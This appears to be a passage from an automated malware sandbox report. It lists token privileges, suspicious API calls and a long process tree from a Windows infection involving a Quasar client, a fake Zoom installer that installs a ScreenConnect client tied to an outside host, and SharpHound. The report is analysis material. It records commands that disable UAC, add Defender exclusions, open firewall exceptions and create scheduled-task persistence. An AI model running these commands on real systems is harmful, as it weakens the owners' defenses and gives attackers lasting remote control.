| Token: SeImpersonatePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\634977\Surrey.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\634977\Surrey.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\634977\Surrey.com | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\634977\Surrey.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\634977\Surrey.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\634977\Surrey.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\22.exe | N/A |
| N/A | N/A | C:\Windows\system32\dll32\msinfo32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\Network.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\333.exe | N/A |
| N/A | N/A | C:\Windows\system32\Windows Shell Interactive.exe | N/A |
| N/A | N/A | C:\Windows\system32\dll32\msinfo32.exe | N/A |
| N/A | N/A | C:\Windows\system32\Windows Shell Interactive.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
| N/A | N/A | C:\Windows\system32\dll32\msinfo32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe"
C:\ProgramData\Synaptics\Synaptics.exe
"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
"C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate
C:\Users\Admin\AppData\Local\Temp\a\1.exe
"C:\Users\Admin\AppData\Local\Temp\a\1.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy Universities Universities.cmd & Universities.cmd
C:\Users\Admin\AppData\Local\Temp\a\test.exe
"C:\Users\Admin\AppData\Local\Temp\a\test.exe"
C:\Users\Admin\AppData\Local\Temp\a\Update.exe
"C:\Users\Admin\AppData\Local\Temp\a\Update.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "opssvc wrsa"
C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe
"C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\0cef7d10d8f459fc\ScreenConnect.ClientSetup.msi"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 634977
C:\Windows\SysWOW64\extrac32.exe
extrac32 /Y /E Gtk
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\findstr.exe
findstr /V "Constitution" Wagon
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b 634977\Surrey.com + Firewire + Values + Expanding + Representing + Gothic + Voltage + Refinance + Nec + Kate 634977\Surrey.com
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Courage + ..\Remove + ..\Throws + ..\Competing Q
C:\Users\Admin\AppData\Local\Temp\634977\Surrey.com
Surrey.com Q
C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe
"C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe"
C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe
"C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe"
C:\Users\Admin\AppData\Local\Temp\a\windows.exe
"C:\Users\Admin\AppData\Local\Temp\a\windows.exe"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 7DFC0315C2B2425ED030A7470E203C96 C
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSID27B.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_259445449 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
C:\Users\Admin\AppData\Local\Temp\a\T.exe
"C:\Users\Admin\AppData\Local\Temp\a\T.exe"
C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe
"C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Bitdefender\$77-Bitdefender.exe"
C:\ProgramData\Bitdefender\$77-Bitdefender.exe
C:\ProgramData\Bitdefender\$77-Bitdefender.exe
C:\Users\Admin\AppData\Local\Temp\a\access.exe
"C:\Users\Admin\AppData\Local\Temp\a\access.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\svchost.exe
svchost.exe
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
C:\Users\Admin\AppData\Local\Temp\a\36.exe
"C:\Users\Admin\AppData\Local\Temp\a\36.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1732 -s 156
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"' & exit
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpE189.tmp.bat""
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Users\Admin\AppData\Local\Temp\a\99999.exe
"C:\Users\Admin\AppData\Local\Temp\a\99999.exe"
C:\Users\Admin\AppData\Local\Temp\a\22.exe
"C:\Users\Admin\AppData\Local\Temp\a\22.exe"
C:\Users\Admin\AppData\Roaming\server.exe
"C:\Users\Admin\AppData\Roaming\server.exe"
C:\Users\Admin\AppData\Roaming\system.exe
"C:\Users\Admin\AppData\Roaming\system.exe"
C:\Users\Admin\AppData\Local\Temp\a\discordupdate.exe
"C:\Users\Admin\AppData\Local\Temp\a\discordupdate.exe"
C:\Users\Admin\AppData\Local\Temp\a\Network.exe
"C:\Users\Admin\AppData\Local\Temp\a\Network.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2600 -s 684
C:\Windows\system32\DrvInst.exe
DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000005B4" "00000000000003E0"
C:\Users\Admin\AppData\Local\Temp\a\rea.exe
"C:\Users\Admin\AppData\Local\Temp\a\rea.exe"
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
C:\Windows\system32\dll32\msinfo32.exe
"C:\Windows\system32\dll32\msinfo32.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
"Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\Admin\AppData\Local\Temp\a\T.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\T.exe' -Force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
"Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Enalib.exe' -Force
C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe
"C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\AclqLgFB8I0B.bat" "
C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /f /tn "SCSI Host" /xml "C:\Users\Admin\AppData\Local\Temp\tmpE62.tmp"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 8BD0D7494D24BA86F55F18A3C1C05FB6
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Network.exe'
C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /f /tn "SCSI Host Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmp10A5.tmp"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 41A763ADD0F1DF3212DC42565CDD272C M Global\MSI0000
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Network.exe'
C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe
"C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=mail.mindfulinvoice.online&p=8041&s=64840446-9df6-4c65-8411-6e7dc5c317a5&k=BgIAAACkAABSU0ExAAgAAAEAAQBBzfcAyYpoA9s86t45oTU7RBr4d3j4wo7ZWaxqW1gXVfaaoS%2bfd0k%2bPJKuwjzsEUcR0STNhshdEUFtsJUgTCaM2RxVswQODfRB%2fxy8spQ2LWWZZewzTdxJbjosBiXV2QpUCcfCmF5yx2%2fO4iVCF7r%2bUlzDG93NmkPtCrZC9yxqlnxALMX%2bF%2faXCCBkyDmMu3o22AbtP3XzZdSzxk8RbscXClS7evLV%2bxau13F1YFn%2baxZ7QaXuHbPv1tE2Bs26tkj%2fE18oOxpgof0OaK2Jy%2bP9WIy8ymeDPQIfocdTFuAek5wZ3lNpFAcbox7NXzIde9yf0dLrOLPA36Dg%2fHz05hjY&c=zoom&c=zoom-invite.com&c=&c=&c=&c=&c=&c="
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Network.exe'
C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe
"C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe" "RunRole" "33ae33d0-0a18-44cf-9eee-21fa31a09983" "User"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Network" /tr "C:\Users\Admin\AppData\Roaming\Network.exe"
C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe
"C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe" "RunRole" "6908b49c-ba33-40d9-a062-3d98cb504da9" "System"
C:\Windows\system32\dll32\msinfo32.exe
"C:\Windows\system32\dll32\msinfo32.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\h1jVzK3VHgGC.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Local\Temp\a\SharpHound.exe
"C:\Users\Admin\AppData\Local\Temp\a\SharpHound.exe"
C:\Users\Admin\AppData\Local\Temp\a\mod.exe
"C:\Users\Admin\AppData\Local\Temp\a\mod.exe"
C:\Users\Admin\AppData\Local\Temp\a\Server.exe
"C:\Users\Admin\AppData\Local\Temp\a\Server.exe"
C:\Users\Admin\AppData\Local\Temp\a\Client.exe
"C:\Users\Admin\AppData\Local\Temp\a\Client.exe"
C:\Users\Admin\AppData\Local\Temp\a\jij.exe
"C:\Users\Admin\AppData\Local\Temp\a\jij.exe"
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
C:\Windows\system32\Windows Shell Interactive.exe
"C:\Windows\system32\Windows Shell Interactive.exe"
C:\Users\Admin\AppData\Local\Temp\a\333.exe
"C:\Users\Admin\AppData\Local\Temp\a\333.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\csGMovlsCz1U.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\dll32\msinfo32.exe
"C:\Windows\system32\dll32\msinfo32.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\NFL5X40U9rBT.bat" "
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Windows\system32\Windows Shell Interactive.exe
"C:\Windows\system32\Windows Shell Interactive.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\gGd6Sc0CVxKo.bat" "
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\dll32\msinfo32.exe
"C:\Windows\system32\dll32\msinfo32.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\yP7ocPgnzpZX.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Windows\system32\taskeng.exe
taskeng.exe {84918601-C221-4502-93B5-1C459B54D35C} S-1-5-21-312935884-697965778-3955649944-1000:MXQFNXLT\Admin:Interactive:[1]
C:\Users\Admin\AppData\Roaming\Network.exe
C:\Users\Admin\AppData\Roaming\Network.exe
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Windows\system32\Windows Shell Interactive.exe
"C:\Windows\system32\Windows Shell Interactive.exe"
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\txmSbpHR1z93.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\dll32\msinfo32.exe
"C:\Windows\system32\dll32\msinfo32.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\5CN0SmO4YDaR.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "651472643-1851480589-1118793646175173931221757700610928288111902706164902750728"
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Windows\system32\Windows Shell Interactive.exe
"C:\Windows\system32\Windows Shell Interactive.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\zE5EsdTQVLTE.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\dll32\msinfo32.exe
"C:\Windows\system32\dll32\msinfo32.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\RH1PaQhQWwXm.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Windows\system32\Windows Shell Interactive.exe
"C:\Windows\system32\Windows Shell Interactive.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\hrQrQWtmNAup.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "933312609-406731408-1790982925-15858158391545171218-1087195369-874683945-276761312"
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Windows\system32\dll32\msinfo32.exe
"C:\Windows\system32\dll32\msinfo32.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\XxLvY69ABsZF.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Windows\system32\Windows Shell Interactive.exe
"C:\Windows\system32\Windows Shell Interactive.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\H0JK71MDoDiA.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\dll32\msinfo32.exe
"C:\Windows\system32\dll32\msinfo32.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\NLqbDa60jHZY.bat" "
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Users\Admin\AppData\Local\Temp\a\CondoGenerator.exe
"C:\Users\Admin\AppData\Local\Temp\a\CondoGenerator.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
